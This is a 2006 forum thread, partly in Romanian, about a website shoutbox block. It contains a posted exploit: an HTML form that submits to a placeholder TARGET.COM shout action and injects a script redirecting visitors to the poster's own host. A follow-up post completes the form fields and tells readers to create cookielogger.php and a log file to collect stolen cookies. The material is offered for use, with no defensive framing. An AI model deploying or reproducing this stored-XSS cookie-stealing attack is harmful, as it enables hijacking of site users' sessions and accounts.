irc_boy Posted July 13, 2006 Report Share Posted July 13, 2006 This is your basic shoutbox. Your registers users type in a message and click shout. Guests on yoursite (if you give them access to the block) will type in their name, email address and message beforeclicking shout.The format of each 'shout' is Date, Name, Message. If a registered user posts a shout, their namebecomes a link to their profile. If a guest posts a shout, their name is a mailto: to the emailaddress they entered.Vulnerabilities:----------------------------------------Create an html file :<center><form action="http://WWW.TARGET.COM/index.php?action=shout" method="post"><input value="http://WWW.TARGET.COM/index.php?" name="qstr" type="hidden"><input value="" name="email" type="hidden"><input value=" <SCRIPT>location.href='http://WWW.YOURS Quote Link to comment Share on other sites More sharing options...
Criminal Posted July 13, 2006 Report Share Posted July 13, 2006 mersi irc_boy , cand am vrut sa-l pun mi-o dat erroare.Internal Server ErrorThe server encountered an internal error or misconfiguration and was unable to complete your request.Please contact the server administrator to inform of the time the error occurred and of anything you might have done that may have caused the error.More information about this error may be available in the server error log.nu e postat tot mai trebuia:<input value="[HERE MEMBERID EXAMPLE: 2]" name="memberID" type="hidden"><input value="Message" name="message" size="16" maxlength="300" onfocus="if (this.value == 'Message')this.value=''" type="text"><input name="submit" value="Shout" type="submit"></form></center>-----------------------------------------------Create the page cookielogger.php & logfile.txt ----------------------------------------------- Quote Link to comment Share on other sites More sharing options...
irc_boy Posted July 13, 2006 Author Report Share Posted July 13, 2006 Intotdeauna e loc de mai bine Quote Link to comment Share on other sites More sharing options...
